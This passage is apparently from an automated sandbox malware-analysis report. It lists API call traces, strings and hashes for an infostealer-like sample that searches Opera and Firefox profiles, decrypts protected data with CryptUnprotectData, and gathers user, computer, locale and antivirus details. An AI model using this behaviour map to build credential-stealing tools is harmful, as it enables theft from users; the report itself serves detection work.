                                                                            • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                            • lstrcat.KERNEL32(?,00426884), ref: 00415BBB
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                            • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 2282932919-4073750446
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00409F77
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                            • StrCmpCA.SHLWAPI(?,00425E10), ref: 0040A050
                                                                            • StrCmpCA.SHLWAPI(?,00425E14), ref: 0040A06A
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera,00425BBB,00425BBA,00425BB7,00425BB6,00425BB3,00425BB2,00425BAF), ref: 0040A0FD
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                            • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                            • API String ID: 3869166975-536343317
                                                                            • Opcode ID: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                            • Instruction ID: 1112d73afc027f2f7bfb5dc7aaaada1126a1c892b2eba4476be0d084da770975
                                                                            • Opcode Fuzzy Hash: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                            • Instruction Fuzzy Hash: F6424B70904288EACB15EBE5C955BDDBBB4AF19308F5040BEE409736C2DB781B4CDB66
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415848
                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                            • memset.MSVCRT ref: 004158C9
                                                                            • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                              • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                              • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                              • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                              • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                              • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                              • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                              • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                              • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                              • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                              • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                            • lstrlenA.KERNEL32(?), ref: 00415998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                            • API String ID: 2879972474-147700698
                                                                            • Opcode ID: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                            • Instruction ID: 4715bdd0870850b2207078c54e98d1efd7a256ad646b0eee288a0e2f42291a72
                                                                            • Opcode Fuzzy Hash: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                            • Instruction Fuzzy Hash: 095170B190029CEADF30EF61DC55EEF7B7DAF05304F50003ABA15A2191DB386A89CB95
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00401167
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                            • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                            • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                            • FindClose.KERNEL32(?), ref: 00401BE5
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                              • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                              • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                              • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                              • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                            • String ID: 7$\*.*
                                                                            • API String ID: 40499504-4165053604
                                                                            • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                            • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                            • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                            • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040B468
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                            • StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                            • StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                            • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F2C,?,?,00000000,00425BF3,?,00000000,?), ref: 0040B6C6
                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                            • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                            • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                            • String ID: prefs.js
                                                                            • API String ID: 2318033617-3783873740
                                                                            • Opcode ID: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                            • Instruction ID: ee987ab292ce5c8f0602a9b5561e4dc2d57f8a603593be12f89c118a2121006c
                                                                            • Opcode Fuzzy Hash: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                            • Instruction Fuzzy Hash: D5D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB785B4CCB66
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004094EA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425DC4,?,?,00425BA2,?), ref: 00409567
                                                                            • StrCmpCA.SHLWAPI(?,00425DC8), ref: 00409584
                                                                            • StrCmpCA.SHLWAPI(?,00425DCC), ref: 0040959E
                                                                            • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425DD0,?,?,00425BA3), ref: 00409635
                                                                            • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                              • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                            • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                            • String ID:
                                                                            • API String ID: 322284088-0
                                                                            • Opcode ID: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                            • Instruction ID: 4c01649d4d81a67c5449674785cae23a0a495e6994ebb05e8901edf346d892d0
                                                                            • Opcode Fuzzy Hash: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                            • Instruction Fuzzy Hash: 23C17270900249EADF10EBA5C9167DDBFB8AF09304F10417EE844B36C2DB785B08CBA6
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                            • String ID: /
                                                                            • API String ID: 2868853201-4001269591
                                                                            • Opcode ID: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                            • Instruction ID: 9e35c1e063a1b5006514c6e45779cb792778230f9907b47db8c95fc1ce32a63e
                                                                            • Opcode Fuzzy Hash: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                            • Instruction Fuzzy Hash: 5831EDB1901119EFDB10EFE5D885AEEB7B9EF48304F54407EE509B3681C7785A88CB64
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004106C9
                                                                            • CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                            • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                            • _wtoi64.MSVCRT ref: 00410738
                                                                            • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                            • String ID:
                                                                            • API String ID: 1816492551-0
                                                                            • Opcode ID: 5750feebd910b0a32989819942fd3773d09ff2150041d9a27e94e8ef07c9ed3d
                                                                            • Instruction ID: 59f670c4249691ef4ccd63b580fd690aab74e6bff6ef209727d5cda1ca9931c7
                                                                            • Opcode Fuzzy Hash: 5750feebd910b0a32989819942fd3773d09ff2150041d9a27e94e8ef07c9ed3d
                                                                            • Instruction Fuzzy Hash: ED21A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004111C3
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                            • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 186290926-0
                                                                            • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                            • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                            • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                            • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                            APIs
                                                                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateBinaryCryptProcessString
                                                                            • String ID:
                                                                            • API String ID: 869800140-0
                                                                            • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                            • Instruction ID: 533e96b164cb0d967d7948213eb188af149c3bb85dd902e70f95414ccdf186b2
                                                                            • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                            • Instruction Fuzzy Hash: C2016931500209FFDF118FA5EC449EBBBAEFF4A350B104429F90193210D7759C91EB60
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                            • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                            • wsprintfA.USER32 ref: 0040FCD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                            • String ID:
                                                                            • API String ID: 362916592-0
                                                                            • Opcode ID: 8433f4d383a38eb6f244c74d11323a05115bf9a3e49eb4d70838d4eb9b5bf1c5
                                                                            • Instruction ID: 6938abab0ccb62d13e48435ff1e3c4824b48db837a677b598a72c4a0a60eb356
                                                                            • Opcode Fuzzy Hash: 8433f4d383a38eb6f244c74d11323a05115bf9a3e49eb4d70838d4eb9b5bf1c5
                                                                            • Instruction Fuzzy Hash: 28E09271704234FBEB1067A8AC0EF873A6EAB06725F111262FA16D21D0E6B4990487E5
                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                            • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                            • LocalFree.KERNEL32(?), ref: 004062FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                            • String ID:
                                                                            • API String ID: 2068576380-0
                                                                            • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                            • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                            • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                            • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
